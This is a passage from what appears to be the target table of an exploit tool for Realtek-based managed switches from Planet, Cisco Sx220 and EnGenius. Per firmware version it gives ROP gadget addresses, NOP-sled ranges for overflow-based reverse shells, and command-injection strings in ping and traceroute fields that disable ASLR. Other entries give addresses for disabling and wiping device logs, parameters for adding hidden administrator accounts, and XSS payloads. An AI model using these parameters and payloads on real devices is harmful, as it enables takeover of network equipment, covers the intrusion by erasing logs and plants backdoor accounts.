/tmp/check;&tr_maxhop=30&count=1',\r\n\t\t\t\t\t\t#'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x4243FC,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_trace_route_post()\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x489368,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x48AB84,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x48C240,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42DA80,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42DA80,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42C868,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'START':0x7ffeee04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you 
dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 45,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\t\t\t'218-7473': {\r\n\t\t\t\t'template':'Planet',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'2.0b160727',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'GS-4210-24T2S',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.planet.com.tw/en/product/GS-4210-24T2S',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E04C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484029c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'web_sys_ping_post':0x424594,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_ping_post()\r\n\r\n\t\t\t\t\t\t# 
traceroute\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&tr_maxhop=30&count=1',\r\n\t\t\t\t\t\t#'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x424DF4,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_trace_route_post()\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x48AA98,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x48D9F4,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x48D9F4,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42E474,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42E474,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42D25c,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'START':0x7ffeee04,\t\t\t\t# start: 
Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 45,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Cisco Systems, Inc.\r\n\t\t\t# Sx220 Series\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'225-51973': {\r\n\t\t\t\t'template':'Cisco',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.1.3.1',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40F70C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998524,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484683c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': 
False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_ping_set()\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t'web_sys_ping_post':0x43535C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&srvHost=127.0.0.1 \";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;\"&count=1',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_tracert_set()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x43567C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'&srvHost=127.0.0.1 \";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;\"&count=1',\r\n\t\t\t\t\t\t#'sys_ping_post_check':'',\r\n\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()\r\n\t\t\t\t\t\t'log_settings_set':0x436FDC,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x436F34,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x436F88,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x434FB0,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# 
/sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x4350D8,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x434140,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\t\t\t'225-60080': {\r\n\t\t\t\t'template':'Cisco',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.1.4.1',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40ffac,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998530,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24847b6c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 
8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_ping_set()\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t'web_sys_ping_post':0x43535C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&srvHost=127.0.0.1 \";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;\"&count=1',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_tracert_set()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x43567C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'&srvHost=127.0.0.1 \";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;\"&count=1',\r\n\t\t\t\t\t\t#'sys_ping_post_check':'',\r\n\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()\r\n\t\t\t\t\t\t'log_settings_set':0x436FDC,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x436F34,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x436F88,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': 
{\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x434FB0,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x4350D8,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x434140,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# EnGenius Technologies, Inc.\r\n\t\t\t# EGS series\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'14044-509': {\r\n\t\t\t\t'template':'EnGenius',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.05.20_150810-1754',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'EGS2110P',\t\t\t\t# 
Model\r\n\t\t\t\t'uri':'https://www.engeniustech.com/engenius-products/8-port-gigabit-smart-switch-egs2110p/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E12C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248405a0,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post': 0x42382C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t# pt: 0 = no password, 1 = cleartext, 2 = encrypted\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x423E74,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',\t\t\t# Admin, priv 15\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; 
sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x423E74,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pt=2&pv=0&op=0',\t\t# \r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()\r\n\t\t\t\t\t\t'log_settings_set':0x43DE18,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_ramClear':0x43F934,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_fileClear':0x43F934,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x424844,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x424844,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x424844,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'security.cgi',\t\t\t# /sqfs/home/web/cgi-bin/security.cgi; main()\r\n\t\t\t\t\t\t'START':0x100181A0,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x104006A0,\t\t\t\t# end: You may want to play with this if you dont get it 
working\r\n\t\t\t\t\t\t'usr_nop': 987,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 69,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# EnGenius Technologies, Inc.\r\n\t\t\t# EWS series\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'14044-32589': {\r\n\t\t\t\t'template':'EnGenius',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.06.21_c1.8.77_180906-0716',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'EWS1200-28TFP',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.engeniustech.com/engenius-products/managed-poe-network-switch-ews1200-28tfp/',\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'cpl_locallogin.cgi (XSS)': {\r\n\t\t\t\t\t\t\t'description':'XSS in \"redirecturl,userurl,loginurl,username,password\" (PoC: Count passed XSS)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'xss',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=<script>alert(XSS);</script>&userurl=<script>alert(XSS);</script>&loginurl=<script>alert(XSS);</script>',\r\n\t\t\t\t\t\t\t'content':'username=<script>alert(XSS);</script>&password=<script>alert(XSS);</script>',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.captivePortal.login (XSS)': {\r\n\t\t\t\t\t\t\t'description':'XSS in \"userurl & uamip\" (PoC: Count passed 
